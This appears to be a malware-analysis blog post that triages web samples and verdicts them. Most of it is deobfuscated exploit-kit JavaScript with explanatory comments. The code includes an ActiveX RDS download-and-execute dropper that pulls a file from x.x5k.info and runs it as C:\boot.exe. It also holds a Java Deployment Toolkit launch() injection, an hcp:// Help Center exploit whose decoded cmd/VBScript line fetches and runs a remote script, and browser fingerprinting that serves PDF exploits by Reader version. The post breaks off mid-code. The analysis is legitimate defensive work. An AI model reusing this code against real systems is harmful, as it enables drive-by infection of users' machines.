Web Malware

 

1] 2.htm

 

After deobfuscation:

// Sample 1 (2.htm): classic ActiveX "download-and-execute" dropper.
// CLSID BD96C556-65A3-11D0-983A-00C04FC29E36 is the one commonly identified as
// the RDS (Remote Data Services) DataSpace control, i.e. the MS06-014 vector:
// its CreateObject() hands back COM objects (XMLHTTP, ADODB.Stream,
// Shell.Application) that the Internet zone would otherwise refuse to script.
// Flow: GET url -> write the bytes to a binary ADODB.Stream -> save as
// C:\boot.exe -> ShellExecute with a hidden window.
var url, path;

url = “http://x.x5k.info/x.css”; // named like a stylesheet; the body is whatever ends up in boot.exe

path = “C:\\boot.exe”; // drop location (requires write access to the system drive root)

try {

var ado = (document.createElement(“object”));

var d = 1; // d, e, f, g, h, n below are junk assignments: never read, presumably filler to break signatures

ado.setAttribute(“classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36”); // RDS.DataSpace

var e = 1;

var xml = ado.CreateObject(“Microsoft.XMLHTTP”, “”); // downloader, obtained through RDS rather than new ActiveXObject

var f = 1;

var ab = “Adodb.”; // ProgID split in two so the literal "Adodb.Stream" never appears in the script

var cd = “Stream”;

var g = 1;

var as = ado.createobject(ab + cd, “”); // ADODB.Stream (IDispatch name lookup is case-insensitive, hence the lowercase call)

var h = 1;

xml.Open(“GET”, url, 0); // third argument is the async flag: 0 = synchronous, so responseBody is complete before it is read

xml.Send();

as.type = 1; // adTypeBinary

var n = 1;

as.open();

as.write(xml.responseBody); // raw bytes, not responseText

as.savetofile(path, 2); // 2 = adSaveCreateOverWrite: replaces an existing C:\boot.exe

as.close();

var shell = ado.createobject(“Shell.Application”, “”);

shell.ShellExecute(path, “”, “”, “open”, 0) // nShowCmd 0: run the dropped file with no visible window

}

catch (e){ // every failure is swallowed so the victim sees nothing (this e shadows the junk var e above)

}

;

var url, path;

url = “http://x.x5k.info/x.css”;

path = “C:\\boot.exe”;

try {

var ado = (document.createElement(“object”));

var d = 1;

ado.setAttribute(“classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36”);

var e = 1;

var xml = ado.CreateObject(“Microsoft.XMLHTTP”, “”);

var f = 1;

var ab = “Adodb.”;

var cd = “Stream”;

var g = 1;

var as = ado.createobject(ab + cd, “”);

var h = 1;

xml.Open(“GET”, url, 0);

xml.Send();

as.type = 1;

var n = 1;

as.open();

as.write(xml.responseBody);

as.savetofile(path, 2);

as.close();

var shell = ado.createobject(“Shell.Application”, “”);

shell.ShellExecute(path, “”, “”, “open”, 0)

}

catch (e){

}

;

The same routine appears twice in the deobfuscated output (the script is simply duplicated), so only one copy is analysed below.

The script instantiates the ActiveX control with CLSID BD96C556-65A3-11D0-983A-00C04FC29E36 — commonly identified as the RDS (Remote Data Services, not "Remote Data Stream") DataSpace control, the classic MS06-014 vector — and uses its CreateObject() method to obtain Microsoft.XMLHTTP, ADODB.Stream and Shell.Application instances outside the normal Internet-zone restrictions. The ADODB.Stream ProgID is built by string concatenation ("Adodb." + "Stream"), presumably to defeat naive signature matching. The hard-coded URL recovered in the debugger is passed to xml.Open("GET", url, 0); the third argument is the async flag (0 = synchronous), not an offset. The downloaded bytes are written to an ADODB.Stream whose type is set to 1 (adTypeBinary) and saved to C:\boot.exe on the system drive.

At the outset an <object> element is created with the createElement() DOM call and given the classid attribute shown above. The CreateObject() method of that RDS object, rather than a direct new ActiveXObject(), is then used to instantiate Microsoft.XMLHTTP and the other components.

savetofile(path, 2) writes the downloaded byte stream to C:\boot.exe; mode 2 is adSaveCreateOverWrite, so any existing file of that name is replaced. A Shell.Application instance is then created the same way and ShellExecute(path, "", "", "open", 0) runs the dropped file with nShowCmd = 0, i.e. no visible window. The enclosing try/catch has an empty catch block, so if any step fails the user is never shown an error. Note also that the remote resource is named x.css: the executable is served under a stylesheet name, which is worth remembering when hunting proxy logs.

The URI http://x.x5k.info/x.css is listed in the Malware Domain List as:

2010/12/19_16:35 x.x5k.info/x.css 61.164.149.106 X5K.INFO@domainsbyproxy.com

Result Malicious.

2] Suspended.htm

Not malicious.

3] http://www.bmwdiscounts.com.au.htm

Not malicious.

4] pic.php

clip_image002

The whole deobfuscated code is shown below:

var provl = String.fromCharCode

function end_redirect(){

}

;

document.write(”

<body><style type=’text/css’>.css {behavior: url(#default#userData);}</style><MARQUEE i

d=’mrq’ class=’css’></MARQUEE></body>”);

This document.write() does not embed a PDF. It writes a <body> containing an empty <MARQUEE> whose class attaches the IE-only DHTML behavior #default#userData. The PDF exploit is delivered later, through the iframes added in dsfgsdfh() once the Reader version is known. What the userData/marquee element itself is for is not established by this script alone (it may be a trigger for a separate IE issue or leftover kit code); treat that as unconfirmed.

// Entry wrapper: its only work is to call zazo(), which carries the Java
// Deployment Toolkit launch() command-line injection below. zazo() then calls
// ai() (the hcp:// Help Center exploit), and ai() calls dsfgsdfh() (Reader
// fingerprinting plus the version-specific PDF exploit iframe).
function ewvf(){ // thin wrapper around zazo(); see the call chain described above

zazo();

}

;

function zazo(){

try {

var cg =

“http: -J-jar -J\\\\178.162.174.42\\pub\\new.avi http://fotu.cz.cc/d.php?f=16&e=1 none”

;

The string is a Java Web Start command line: the "-J-jar -J\\178.162.174.42\pub\new.avi" arguments make javaws load a JAR from a remote UNC share (the .avi extension is only a disguise; -jar treats the file as a JAR regardless of name). This is the Java Deployment Toolkit launch() argument injection, CVE-2010-0886 (Candidate status at the time of writing). The JAR fetched from the share is the first-stage payload; the second URL, http://fotu.cz.cc/d.php?f=16&e=1, is presumably handed to it as the location of the next stage.

if (window.navigator.appName == ‘Microsoft Internet Explorer’){

try {

var uiu = document.createElement(‘OBJECT’);

uiu.classid = ‘clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA’;

uiu.launch(cg); //launches “http: -J-jar -J\\\\178.162.174.42\\pub\\new.avi http://fotu.cz.cc/d.php?f=16&e=1 none”

CLSID CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA is the Java Deployment Toolkit ActiveX control; its launch() method does not validate the argument string, so the -J options above reach javaws unchanged. The CLSID used in the catch block below, 8AD9C840-044E-11D1-B3E9-00805F499D93, is the Java Plug-in's dynamic-versioning identifier that resolves to the latest installed JRE; it is tried only as a fallback when the first object throws.

}

(Scanner text, kept for reference: "Java JRE deploytk.dll ActiveX Control Multiple BOF Vulnerabilities — Overview: This host is installed with Java JRE Deployment Toolkit ActiveX and is prone to multiple buffer overflow vulnerabilities." Note that this describes a different class of deploytk.dll issues. What the script actually exercises is the launch() command-line injection, CVE-2010-0886, which is an argument-validation flaw rather than a buffer overflow; the two should not be conflated when mapping this sample to patch levels.)

catch (e){

var ghtb = document.createElement(‘OBJECT’);

ghtb.classid = ‘clsid:8AD9C840-044E-11D1-B3E9-00805F499D93’;

ghtb.launch(cg); // Fallback: clsid 8AD9C840-044E-11D1-B3E9-00805F499D93 is the Java Plug-in's "latest installed version" CLSID, so if the Deployment Toolkit object above throws, the same javaws command line is retried through whichever JRE is installed.

}

}

else {

var uiu = document.createElement(‘OBJECT’);

var ze = document.createElement(‘OBJECT’);

uiu.type = ‘application/npruntime-scriptable-plugin;deploymenttoolkit’;

ze.type = ‘application/java-deployment-toolkit’;

document.body.appendChild(uiu);

document.body.appendChild(ze);

try {

uiu.launch(cg); // Non-IE branch: the same command line goes to the NPAPI Deployment Toolkit plugin, selected by MIME type instead of CLSID; the second object is tried if the first throws.

}

catch (e){

ze.launch(cg);

}

}

}

catch (e){

}

;

ai(); // calls ai(), which uses the hcp:// Help Center exploit below to run a second, char-code-encoded script.

}

;

function ai(){

var bh = ”

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A

%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A

%%A%%A%%A

%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A

%%A%%A%%A

%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A

%%A%%A%%A

%%A..%5C..%5Csysinfomain.htm%u003fsvr=<scr” + ”

ipt defer>eval(Run(String.fromCharCode(99,109,100,32,47,99,32,101,99,104,111,32,66,61,34,1

08,46,118,98,115,34,58,87,105,116,104,32,67,114,101,97,116,101,79,98,106,101,99,116,40,34,

77,83,88,77,76,50,46,88,77,76,72,84,84,80,34,41,58,46,111,112,101,110,32,34,71,69,84,34,44

,34,104,116,116,112,58,47,47,102,111,116,117,46,99,122,46,99,99,47,101,120,112,108,111,105

,116,115,47,104,99,112,95,118,98,115,46,112,104,112,63,102,61,49,54,34,44,102,97,108,115,1

01,58,46,115,101,110,100,40,41,58,83,101,116,32,65,32,61,32,67,114,101,97,116,101,79,98,10

6,101,99,116,40,34,83,99,114,105,112,116,105,110,103,46,70,105,108,101,83,121,115,116,101,

109,79,98,106,101,99,116,34,41,58,83,101,116,32,68,61,65,46,67,114,101,97,116,101,84,101,1

20,116,70,105,108,101,40,65,46,71,101,116,83,112,101,99,105,97,108,70,111,108,100,101,114,

40,50,41,32,43,32,34,92,34,32,43,32,66,41,58,68,46,87,114,105,116,101,76,105,110,101,32,46

,114,101,115,112,111,110,115,101,84,101,120,116,58,69,110,100,32,87,105,116,104,58,68,46,6

7,108,111,115,101,58,67,114,101,97,116,101,79,98,106,101,99,116,40,34,87,83,99,114,105,112

,116,46,83,104,101,108,108,34,41,46,82,117,110,32,65,46,71,101,116,83,112,101,99,105,97,10

8,70,111,108,100,101,114,40,50,41,32,43,32,34,92,34,32,43,32,66,32,62,32,37,84,69,77,80,37

,92,92,108,46,118,98,115,32,38,38,32,37,84,69,77,80,37,92,92,108,46,118,98,115,32,38,38,32

,116,97,115,107,107,105,108,108,32,47,70,32,47,73,77,32,104,101,108,112,99,116,114,46,101,

120,101)));</scr” + “ipt>”;

var m = document.createElement(‘iframe’);

m.setAttribute(‘src’, bh);

m.setAttribute(‘width’, 0);

m.setAttribute(‘height’, 0);

m.setAttribute(‘frameborder’, ‘0’);

document.body.appendChild(m);

dsfgsdfh();

}

;

This is the Windows Help Center (helpctr.exe) hcp:// protocol exploit. The URL escapes out of the whitelisted sysinfomain.htm topic (the long %%A run and the ..%5C..%5C traversal defeat the whitelist check) and injects a deferred <script> through the svr= parameter, which Help Center then renders in a privileged context. CVE-2010-1885 (Candidate status at the time of writing). The injected script decodes the char codes into a cmd.exe command line (shown further below) and executes it via eval(Run(...)), Run presumably being a helper available to Help Center pages.

function dsfgsdfh(){

try {

function addp(src){

var p = document.createElement(‘iframe’);

p.setAttribute(‘src’, src);

p.setAttribute(‘width’, 0);

p.setAttribute(‘height’, 0);

p.setAttribute(‘frameborder’, ‘0’);

document.body.appendChild(p);

}

var PluginDetect = {

handler : function (c, b, a){

return function (){

c(b, a)

}

}

, isDefined : function (b){

return typeof b != “undefined”

}

, isArray : function (b){

return (b && b.constructor === Array)

}

, isFunc : function (b){

return typeof b == “function”

}

, isString : function (b){

return typeof b == “string”

}

, isNum : function (b){

return typeof b == “number”

}

, isStrNum : function (b){

return (typeof b == “string” && (/\d/).test(b))

}

, getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g,

getNum : function (b, c){

var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx

).exec(b) : null;

return a ? a[0].replace(d.splitNumRegx, “,”) : null

}

, compareNums : function (h, f, d){

var e = this , c, b, a, g = parseInt;

if (e.isStrNum(h) && e.isStrNum(f)){

if (e.isDefined(d) && d.compareNums){

return d.compareNums(h, f)

}

c = h.split(e.splitNumRegx);

b = f.split(e.splitNumRegx);

for (a = 0; a < Math.min(c.length, b.length);

a ++ ){

if (g(c[a], 10) > g(b[a], 10)){

return 1

}

if (g(c[a], 10) < g(b[a], 10)){

return – 1

}

}

}

return 0

}

, formatNum : function (b, c){

var d = this , a, e;

if (!d.isStrNum(b)){

return null

}

if (!d.isNum(c)){

c = 4

}

c–;

e = b.replace(/\s/g, “”).split(d.splitNumRegx).concat([“0”, “0”, “0”, “0”]);

for (a = 0; a < 4; a ++ ){

if (/^(0+)(.+)$/.test(e[a])){

e[a] = RegExp.$2

}

if (a > c ||! (/\d/).test(e[a])){

e[a] = “0”

}

}

return e.slice(0, 4).join(“,”)

}

, $$hasMimeType : function (a){

return function (d){

if (!a.isIE){

var c, b, e, f = a.isString(d) ? [d] : d;

for (e = 0; e < f.length; e ++ ){

if (/[^\s]/.test(f[e]) && (c = navigator.mimeTypes[f[e]]) && (b = c.

enabledPlugin) && (b.name || b.description)){

return c

}

}

}

return null

}

}

, findNavPlugin : function (l, e, c){

var j = this , h = new RegExp(l, “i”), d = (!j.isDefined(e) || e) ?/\ d /: 0, k =

c ? new RegExp(c, “i”) : 0, a = navigator.plugins, g = “”, f, b, m;

for (f = 0; f < a.length; f ++ ){

m = a[f].description || g;

b = a[f].name || g;

if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (

h.test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){

if (!k ||! (k.test(m) || k.test(b))){

return a[f]

}

}

}

return null

}

, getMimeEnabledPlugin : function (a, e){

var d = this , b, c = new RegExp(e, “i”);

if ((b = d.hasMimeType(a)) && (b = b.enabledPlugin) && (c.test(b.description || “”

) || c.test(b.name || “”))){

return b

}

return 0

}

, getPluginFileVersion : function (f, b){

var h = this , e, d, g, a, c =- 1;

if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){

return b

}

if (!b){

return e

}

e = h.formatNum(e);

b = h.formatNum(b);

d = b.split(h.splitNumRegx);

g = e.split(h.splitNumRegx);

for (a = 0; a < d.length; a ++ ){

if (c >- 1 && a > c && d[a] != “0”){

return b

}

if (g[a] != d[a]){

if (c ==- 1){

c = a

}

if (d[a] != “0”){

return b

}

}

}

return e

}

, AXO : window.ActiveXObject, getAXO : function (b, a){

var g = null, f, d = false, c = this ;

try {

g = new c.AXO(b);

d = true

}

catch (f){

}

if (c.isDefined(a)){

deleteg;

return d

}

return g

}

, convertFuncs : function (f){

var a, g, d, b =/^ [ \ $][ \ $] /, c = {

}

;

for (ain f){

if (b.test(a)){

c[a] = 1

}

}

for (ain c){

try {

g = a.slice(2);

if (g.length > 0 &&! f[g]){

f[g] = f[a](f)

}

}

catch (d){

}

}

}

, initScript : function (){

var c = this , a = navigator, d = “/”, h = a.userAgent || “”, f = a.vendor || “”,

b = a.platform || “”, g = a.product || “”;

c.OS = (/win/i).test(b) ? 1 : ((/mac/i).test(b) ? 2 : ((/linux/i).test(b) ? 3 : 4

));

c.convertFuncs(c);

c.isIE = new Function(“return ” + d + “*@cc_on!@*” + d + “false”)();

c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(h) ? parseFloat(RegExp.$1, 10) :

null ;

c.ActiveXEnabled = false;

if (c.isIE){

var e, i = [“Msxml2.XMLHTTP”, “Msxml2.DOMDocument”, “Microsoft.XMLDOM”,

“ShockwaveFlash.ShockwaveFlash”, “TDCCtl.TDCCtl”, “Shell.UIHelper”,

“Scripting.Dictionary”, “wmplayer.ocx”];

for (e = 0; e < i.length; e ++ ){

if (c.getAXO(i[e], 1)){

c.ActiveXEnabled = true;

break

}

}

c.head = c.isDefined(document.getElementsByTagName) ? document.

getElementsByTagName(“head”)[0] : null

}

c.isGecko = (/Gecko/i).test(g) && (/Gecko\s*\/\s*\d/i).test(h);

c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(h) ? RegExp.

$1 : “0.9”) : null;

c.isSafari = (/Safari\s*\/\s*\d/i).test(h) && (/Apple/i).test(f);

c.isChrome = (/Chrome\s*\/\s*\d/i).test(h);

c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(h);

c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(h) || 1) ?

parseFloat(RegExp.$1, 10) : null;

c.addWinEvent(“load”, c.handler(c.runWLfuncs, c))

}

, init : function (d, a){

var c = this , b;

if (!c.isString(d)){

return – 3

}

if (d.length == 1){

c.getVersionDelimiter = d;

return – 3

}

b = c[d.toLowerCase().replace(/\s/g, “”)];

if (!b ||! b.getVersion){

return – 3

}

c.plugin = b;

if (!c.isDefined(b.installed) || a == true){

b.installed = b.version = b.version0 = b.getVersionDone = null;

b.$ = c

}

c.garbage = false;

if (c.isIE &&! c.ActiveXEnabled){

if (b !== c.java){

return – 2

}

}

return 1

}

, fPush : function (b, a){

var c = this ;

if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0

])))){

a[a.length] = b

}

}

, callArray : function (b){

var c = this , a;

if (c.isArray(b)){

for (a = 0; a < b.length; a ++ ){

if (b[a] === null){

return

}

c.call(b[a]);

b[a] = null

}

}

}

, call : function (c){

var b = this , a = b.isArray(c) ? c.length :- 1;

if (a > 0 && b.isFunc(c[0])){

c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0)

}

else {

if (b.isFunc(c)){

c(b)

}

}

}

, $$isMinVersion : function (a){

return function (h, g, d, c){

var e = a.init(h), f, b =- 1;

if (e < 0){

return e

}

f = a.plugin;

g = a.formatNum(a.isNum(g) ? g.toString() : (a.isString(g) ? a.getNum(g) : “0”

));

if (!a.isStrNum(g)){

return – 3

}

if (f.getVersionDone != 1){

f.getVersion(d, c);

if (f.getVersionDone === null){

f.getVersionDone = 1

}

}

a.cleanup();

if (f.installed !== null){

b = f.installed <= 0.5 ? f.installed : (f.version === null ? 0 : (a.

compareNums(f.version, g, f) >= 0 ? 1 :- 1))

}

return b

}

}

, getVersionDelimiter : “,”, $$getVersion : function (a){

return function (g, d, c){

var e = a.init(g), f, b;

if (e < 0){

return null

}

f = a.plugin;

if (f.getVersionDone != 1){

f.getVersion(d, c);

if (f.getVersionDone === null){

f.getVersionDone = 1

}

}

a.cleanup();

b = (f.version || f.version0);

return b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b

}

}

, cleanup : function (){

}

, addWinEvent : function (d, c){

var e = this , a = window, b;

if (e.isFunc(c)){

if (a.addEventListener){

a.addEventListener(d, c, false)

}

else {

if (a.attachEvent){

a.attachEvent(“on” + d, c)

}

else {

b = a[“on” + d];

a[“on” + d] = e.winHandler(c, b)

}

}

}

}

, winHandler : function (d, c){

return function (){

d();

if (typeof c == “function”){

c()

}

}

}

, WLfuncs : [0], runWLfuncs : function (a){

a.winLoaded = true;

a.callArray(a.WLfuncs);

if (a.onDoneEmptyDiv){

a.onDoneEmptyDiv()

}

}

, winLoaded : false, $$onWindowLoaded : function (a){

return function (b){

if (a.winLoaded){

a.call(b)

}

else {

a.fPush(b, a.WLfuncs)

}

}

}

, div : null, divWidth : 50, pluginSize : 1, emptyDiv : function (){

var c = this , a, e, b, d = 0;

if (c.div && c.div.childNodes){

for (a = c.div.childNodes.length – 1; a >= 0; a — ){

b = c.div.childNodes[a];

if (b && b.childNodes){

if (d == 0){

for (e = b.childNodes.length – 1; e >= 0; e — ){

b.removeChild(b.childNodes[e])

}

c.div.removeChild(b)

}

else {

}

}

}

}

}

, onDoneEmptyDiv : function (){

var a = this ;

if (!a.winLoaded){

return

}

if (a.WLfuncs && a.WLfuncs.length > 0 && a.isFunc(a.WLfuncs[a.WLfuncs.length – 1

])){

return

}

if (a.java){

if (a.java.OTF == 3){

return

}

if (a.java.funcs && a.java.funcs.length > 0 && a.isFunc(a.java.funcs[a.java.

funcs.length – 1])){

return

}

}

a.emptyDiv()

}

, getObject : function (c, a){

var g, d = this , f = null, b = d.getContainer(c);

try {

if (b && b.firstChild){

f = b.firstChild

}

if (a && f){

f.focus()

}

}

catch (g){

}

return f

}

, getContainer : function (a){

return (a && a[0] ? a[0] : null)

}

, instantiate : function (j, c, g, a, k){

var m, n = document, i = this , r, q = n.createElement(“span”), o, h, f = “<“;

var l = function (t, s){

var v = t.style, d, u;

if (!v){

return

}

v.outline = “none”;

v.border = “none”;

v.padding = “0px”;

v.margin = “0px”;

v.visibility = “visible”;

if (i.isArray(s)){

for (d = 0; d < s.length; d = d + 2){

try {

v[s[d]] = s[d + 1]

}

catch (u){

}

}

return

}

}

, b = function (){

var t, u = “pd33993399”, s = null, d = (n.getElementsByTagName(“body”)[0] || n.

body);

if (!d){

try {

n.write(f + ‘div id=”‘ + u + ‘”>o’ + f + “/div>”);

s = n.getElementById(u)

}

catch (t){

}

}

d = (n.getElementsByTagName(“body”)[0] || n.body);

if (d){

if (d.firstChild && i.isDefined(d.insertBefore)){

d.insertBefore(i.div, d.firstChild)

}

else {

d.appendChild(i.div)

}

if (s){

d.removeChild(s)

}

}

else {

}

}

;

if (!i.isDefined(a)){

a = “”

}

if (i.isString(j) && (/[^\s]/).test(j)){

r = f + j + ‘ width=”‘ + i.pluginSize + ‘” height=”‘ + i.pluginSize + ‘” ‘;

for (o = 0; o < c.length; o = o + 2){

if (/[^\s]/.test(c[o + 1])){

r += c[o] + ‘=”‘ + c[o + 1] + ‘” ‘

}

}

r += “>”;

for (o = 0; o < g.length; o = o + 2){

if (/[^\s]/.test(g[o + 1])){

r += f + ‘param name=”‘ + g[o] + ‘” value=”‘ + g[o + 1] + ‘” />’

}

}

r += a + f + “/” + j + “>”

}

else {

r = a

}

if (!i.div){

i.div = n.createElement(“div”);

h = n.getElementById(“plugindetect”);

if (h){

i.div = h

}

else {

i.div.id = “plugindetect”;

b()

}

l(i.div, [“width”, i.divWidth + “px”, “height”, (i.pluginSize + 3) + “px”,

“fontSize”, (i.pluginSize + 3) + “px”, “lineHeight”, (i.pluginSize + 3) + “px”,

“verticalAlign”, “baseline”, “display”, “block”]);

if (!h){

l(i.div, [“position”, “absolute”, “right”, “0px”, “top”, “0px”])

}

}

if (i.div && i.div.parentNode){

i.div.appendChild(q);

l(q, [“fontSize”, (i.pluginSize + 3) + “px”, “lineHeight”, (i.pluginSize + 3) +

“px”, “verticalAlign”, “baseline”, “display”, “inline”]);

try {

if (q && q.parentNode){

q.focus()

}

}

catch (m){

}

try {

q.innerHTML = r

}

catch (m){

}

if (q.childNodes.length == 1 &&! (i.isGecko && i.compareNums(i.verGecko,

“1,5,0,0”) < 0)){

l(q.firstChild, [“display”, “inline”])

}

return [q]

}

return [null]

}

, adobereader : {

mimeType : “application/pdf”, navPluginObj : null, progID : [“AcroPDF.PDF”,

“PDF.PdfCtrl”], classID : “clsid:CA8A9780-280D-11CF-A24D-444553540000”, INSTALLED :

{ // per-mime-type cache of install results; getVersion() returns early from this cache on repeat calls

}

, pluginHasMimeType : function (d, c, f){

var b = this , e = b.$, a;

for (ain d){

if (d[a] && d[a].type && d[a].type == c){

return 1

}

}

if (e.getMimeEnabledPlugin(c, f)){

return 1

}

return 0

}

, getVersion : function (i){

var f = this , c = f.$, g, d, j, l = p = null, h = null, k = null, a, b;

i = (c.isString(i) && i.length) ? i.replace(/\s/, “”).toLowerCase() : f.mimeType

;

if (c.isDefined(f.INSTALLED[i])){

f.installed = f.INSTALLED[i];

return

}

if (!c.isIE){ // non-IE browsers (not "IE not installed"): locate the Reader plugin through navigator.mimeTypes/plugins and take the version from its description string

a = “Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in”;

if (f.getVersionDone !== 0){

f.getVersionDone = 0;

p = c.getMimeEnabledPlugin(f.mimeType, a);

if (!p && c.hasMimeType(f.mimeType)){

p = c.findNavPlugin(a, 0)

}

if (p){

f.navPluginObj = p;

h = c.getNum(p.description) || c.getNum(p.name);

h = c.getPluginFileVersion(p, h);

if (!h && c.OS == 1){

if (f.pluginHasMimeType(p, “application/vnd.adobe.pdfxml”, a)){

h = “9”

}

else {

if (f.pluginHasMimeType(p, “application/vnd.adobe.x-mars”, a)){

h = “8”

}

}

}

}

}

else {

h = f.version

}

l = c.getMimeEnabledPlugin(i, a);

f.installed = l && h ? 1 : (l ? 0 : (f.navPluginObj ?- 0.2 :- 1))

}

else {

p = c.getAXO(f.progID[0]) || c.getAXO(f.progID[1]);

b =/=\ s * ([ \ d \ .] + ) / g;

try {

d = (p || c.getObject(c.instantiate(“object”, [“classid”, f.classID], [“src”

, “”], “”, f))).GetVersions();

for (j = 0; j < 5; j ++ ){

if (b.test(d) && (!h || RegExp.$1 > h)){

h = RegExp.$1

}

}

}

catch (g){

}

f.installed = h ? 1 : (p ? 0 :- 1)

}

if (!f.version){

f.version = c.formatNum(h)

}

f.INSTALLED[i] = f.installed

}

}

, zz : 0

}

;

PluginDetect.initScript();

PluginDetect.getVersion(‘.’);

var inp = PluginDetect.getVersion(‘AdobeReader’).split(‘.’);

var sv = parseInt(inp[0] + inp[1] + inp[2]); // concatenates the major/minor/patch digits of the detected Reader version into one integer (e.g. 9.3.1 -> 931, no radix given); the ranges below pick pdf.php for Reader < 8.0.0 and pdf2.php for 8.0.0 through 9.3.0, while 9.3.1 and later receive no PDF exploit at all.

if (sv < 800){

addp(‘./exploits/pdf.php?f=16’);

}

else if ((sv >= 800) && (sv < 931)){

addp(‘./exploits/pdf2.php?f=16’);

}

}

catch (e){

}

;

setTimeout(asgsaf, 4000); //4seconds

}

;

// Second stage of the delay chain: scheduled 4 s after dsfgsdfh() finishes,
// it waits another 3 s and then calls end_redirect(), which is empty.
// The timers therefore add ~7 s of idle time and no further action.
function asgsaf(){

setTimeout(end_redirect, 3000); // 3 s, then a no-op

}

;

ewvf(); // Entry point. ewvf() -> zazo() launches the Java Deployment Toolkit launch() injection (branching on IE vs. other browsers and falling back between the two CLSIDs); zazo() then calls ai(), which adds the hidden hcp:// iframe; ai() finally calls dsfgsdfh(), which runs the bundled PluginDetect library to fingerprint OS (Windows/Mac/Linux) and browser (IE/Gecko/Safari/Chrome/Opera), read the Adobe Reader version, and append a version-specific PDF exploit iframe. The Gecko "1,5,0,0" comparison inside PluginDetect is only a layout workaround for old Firefox, not part of the exploit logic. The two setTimeout calls at the end merely delay an empty end_redirect() by 4 s + 3 s.

clip_image004

The char codes decode to the following command line, which is what the injected script executes:

cmd /c echo B="l.vbs":With CreateObject("MSXML2.XMLHTTP"):.open "GET","http://fotu.cz.cc/exploits/hcp_vbs.php?f=16",false:.send():Set A = CreateObject("Scripting.FileSystemObject"):Set D=A.CreateTextFile(A.GetSpecialFolder(2) + "\" + B):D.WriteLine .responseText:End With:D.Close:CreateObject("WScript.Shell").Run A.GetSpecialFolder(2) + "\" + B > %TEMP%\\l.vbs && %TEMP%\\l.vbs && taskkill /F /IM helpctr.exe

The cmd.exe line echoes a one-line VBScript into %TEMP%\l.vbs (the file is "l.vbs", lowercase L, not "1.vbs"), runs it, and then kills helpctr.exe — the Help Center process hosting the exploit — so the window disappears. The VBScript itself fetches http://fotu.cz.cc/exploits/hcp_vbs.php?f=16 with MSXML2.XMLHTTP over a synchronous GET, writes the response text back over l.vbs in the temporary folder (GetSpecialFolder(2)) via Scripting.FileSystemObject, and runs that file with WScript.Shell, i.e. the Windows Script Host. Nothing binary touches disk at this stage; whatever hcp_vbs.php returns is the next stage, so the server response is what should be captured when reproducing this chain.

RESULT:Malicious.

 

 

5] Index.php

 

clip_image006

After manual deobfuscation we get the following:

// User-Agent substring test: returns 1 when the lowercased navigator.userAgent
// contains M4_gMDT, else 0. Every targeting decision in this sample ("msie",
// "msie 6", "msie 7"/"msie 8", "windows nt 5", "firefox") goes through this
// check, so it is the pivot that decides which exploit path a visitor receives.
function b_0_p_f(M4_gMDT){

if (navigator.userAgent.toLowerCase().indexOf(M4_gMDT) > – 1){ // the '– 1' is a mangled '-1' from the blog rendering

return 1;

}

return 0;

}

// ActiveX availability probe (IE only): tries `new ActiveXObject(progId)` and
// returns true if it constructs, false if the constructor throws. If the
// constructor returns a falsy value without throwing, no return statement is
// reached and the result is undefined (callers treat that as false).
function xGo_3__3(wA_w_Vy){

try {

var obj = new ActiveXObject(wA_w_Vy);

if (obj){

return true;

}

}

catch (e){

return false;

}

}

// Flash Player version fingerprint. Returns [major, minor, build] as digit-only
// strings, or [0, 0, 0] when detection fails. Later code compares the elements
// with == against numbers, so the string/number mismatch is relied upon.
function hQwqbnZ(){

var n4__s_B = [0, 0, 0];

if (b_0_p_f(“msie”)){

try {

// IE: ask the Flash ActiveX control directly; '$version' typically comes
// back as a platform prefix plus comma-separated numbers ("WIN 9,0,45,0").
var L_j1_nU = new ActiveXObject(‘ShockwaveFlash.ShockwaveFlash’).GetVariable(

‘$version’);

L_j1_nU = L_j1_nU.split(“,”);

n4__s_B[0] = L_j1_nU[0].replace(/\D/g, “”); // strips the platform prefix

n4__s_B[1] = L_j1_nU[1].replace(/\D/g, “”);

n4__s_B[2] = L_j1_nU[2].replace(/\D/g, “”);

}

catch (e){ // no Flash control: leave [0, 0, 0]

}

}

else {

try {

// Non-IE: parse the plugin description; the first regex drops the leading
// words, the second turns a " r<n>" / " b<n>" suffix into ".<n>" before splitting.
var XB__We = navigator.plugins[“Shockwave Flash”].description.replace(

/([a-zA-Z]|\s)+/, “”).replace(/(\s+r|\s+b[0-9]+)/, “.”).split(“.”);

n4__s_B[0] = XB__We[0].replace(/\D/g, “”);

n4__s_B[1] = XB__We[1].replace(/\D/g, “”);

n4__s_B[2] = XB__We[2].replace(/\D/g, “”);

}

catch (e){ // plugin absent or unexpected description: leave [0, 0, 0]

}

}

return n4__s_B;

}

// Adobe Reader/Acrobat presence check. Returns 1 if a PDF plugin is found,
// else 0. IE: probe the AcroPDF.PDF and PDF.PdfCtrl ProgIDs; other browsers:
